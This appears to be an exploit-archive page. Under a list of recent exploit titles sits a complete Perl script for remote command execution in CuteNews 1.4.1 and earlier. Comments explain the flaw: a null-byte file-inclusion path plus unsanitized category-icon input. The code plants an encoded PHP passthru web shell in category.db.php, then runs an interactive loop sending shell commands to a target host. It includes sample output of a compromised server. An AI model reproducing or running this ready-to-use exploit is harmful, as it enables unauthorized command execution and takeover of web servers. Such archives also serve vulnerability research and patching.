477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
163 lines
4.4 KiB
Perl
Executable file
163 lines
4.4 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#
|
|
# cijfer-cnxpl - CuteNews <=1.4.1 Remote Command Execution
|
|
#
|
|
# Copyright (c) 2005 cijfer <cijfer@netti.fi>
|
|
# All rights reserved.
|
|
#
|
|
## 1. example
|
|
#
|
|
# [cijfer@kalma:/research]$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news
|
|
# [cijfer@www.xxxx.org /]$ id;uname -a
|
|
# uid=48(apache) gid=48(apache) groups=48(apache),29000(web_serving) context=root:system_r:httpd_sys_script_t
|
|
# Linux server.xxxx.org 2.6.13-1.1532_FC4 #1 Thu Oct 20 01:30:08 EDT 2005 i686 i686 i386 GNU/Linux
|
|
# [cijfer@www.xxxx.org /]$
|
|
#
|
|
## 2. explanation
|
|
#
|
|
# this particular vulnerability is already known (sort of). a
|
|
# bug as exact as this one was found by rgod in CuteNews. the
|
|
# sole difference between his and my bug, are the files that
|
|
# are being exploited. while his was a bug using the following
|
|
# string:
|
|
#
|
|
# show_archives.php?template=../inc/ipban.mdu%00
|
|
#
|
|
# i found my bug in:
|
|
#
|
|
# show_archives.php?template=../inc/categories.mdu%00
|
|
#
|
|
## 3. the bug
|
|
#
|
|
# the bug lies in categories.mdu, located in the /inc/ folder
|
|
# of the cutenews directory.
|
|
#
|
|
# by using the 'template' variable in show_archives.php, we
|
|
# can include any local files. in this case, we're including
|
|
# categories.mdu. why? every .mdu file within the cutenews
|
|
# package has raw PHP code within it, that is not protected
|
|
# like the normal .php files.
|
|
#
|
|
# $template gets sanitized, but can be bypassed depending on
|
|
# php configuration! this is why on some 1.4.0's it works and
|
|
# on some others it does not. it all depends on configuration
|
|
# and whether or not register_globals needs to be on.
|
|
#
|
|
# if(file_exists("$cutepath/data/${template}.tpl")){ require("$cutepath/data/${template}.tpl"); }
|
|
# ...
|
|
#
|
|
# looking into categories.mdu, we notice the following to
|
|
# create our exploit string:
|
|
#
|
|
# if($member_db[1] != 1){ msg("error", "Access Denied", "You don't have permission to edit categories"); }
|
|
# ...
|
|
#
|
|
# elseif($action == "doedit")
|
|
# {
|
|
# ...
|
|
#
|
|
# cannot write arbitrary php code to $cat_name :(
|
|
#
|
|
# $cat_name = htmlspecialchars(stripslashes($cat_name));
|
|
# ...
|
|
#
|
|
# $cat_icon lacks sanitization :))!
|
|
#
|
|
# fwrite($new_cats, "$catid|$cat_name|$cat_icon|||\n");
|
|
# ...
|
|
#
|
|
# adding together all these elements, it is possible to inject
|
|
# php code into data/category.db.php and from there, use our
|
|
# injected code to either include a remote php shell, or run
|
|
# commands on the system.
|
|
#
|
|
##
|
|
#
|
|
# $Id: cijfer-cnxpl.pl,v 0.2 2005/12/26 03:36:00 cijfer Exp cijfer $
|
|
|
|
use IO::Socket;
|
|
use Getopt::Std;
|
|
use URI::Escape;
|
|
|
|
getopts("h:d:");
|
|
|
|
$host = $opt_h;
|
|
$dirs = $opt_d;
|
|
$good = 0;
|
|
|
|
if(!$host)
|
|
{
|
|
print "cijfer-cnxpl.pl by cijfer\n";
|
|
print "usage: $0 -h <hostname> -d [/directory]\r\n";
|
|
exit();
|
|
}
|
|
|
|
while()
|
|
{
|
|
print "[cijfer@".$host." /]\$ ";
|
|
while(<STDIN>)
|
|
{
|
|
$cmds=$_;
|
|
chomp($cmds);
|
|
last;
|
|
}
|
|
|
|
if(!$dirs)
|
|
{
|
|
$dirs = "/cutenews";
|
|
}
|
|
|
|
$string = $dirs;
|
|
$string .= "/show_archives.php?template=../inc/categories.mdu%00";
|
|
$string .= "&member_db[1]=1";
|
|
$string .= "&action=doedit"; #can be changed from 'doedit' to 'add' if no categories exist
|
|
$string .= "&cat_name=cijfer";
|
|
$string .= "&catid=1"; #can be changed to different value if starting catid != 0
|
|
$string .= "&cat_icon=%3C%3Fpassthru%28%24_GET%5Bcij%5D%29%3Bdie%28%29%3B%3F%3E";
|
|
|
|
$cijfer = $dirs;
|
|
$cijfer .= "/data/category.db.php?cij=";
|
|
$cijfer .= uri_escape("echo; ");
|
|
$cijfer .= "%20%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20"; # _START_
|
|
$cijfer .= uri_escape($cmds);
|
|
$cijfer .= "%3B%20%65%63%68%6F%20%5F%45%4E%44%5F"; # _END_
|
|
|
|
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
|
|
|
|
print $sock "GET $string HTTP/1.1\n";
|
|
print $sock "Host: $host\n";
|
|
print $sock "Accept: */*\n";
|
|
print $sock "Connection: close\n\n";
|
|
|
|
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
|
|
|
|
print $sock "GET $cijfer HTTP/1.1\n";
|
|
print $sock "Host: $host\n";
|
|
print $sock "Accept: */*\n";
|
|
print $sock "Connection: close\n\n";
|
|
|
|
while($result = <$sock>)
|
|
{
|
|
if($sock =~ /^403/)
|
|
{
|
|
print "error: 403\n";
|
|
exit();
|
|
}
|
|
if($result =~ /^_END_/)
|
|
{
|
|
$good=0;
|
|
}
|
|
|
|
if($good==1)
|
|
{
|
|
print $result;
|
|
}
|
|
|
|
if($result =~ /^_START_/)
|
|
{
|
|
$good=1;
|
|
}
|
|
}
|
|
}
|
|
|
|
# milw0rm.com [2006-01-01]
|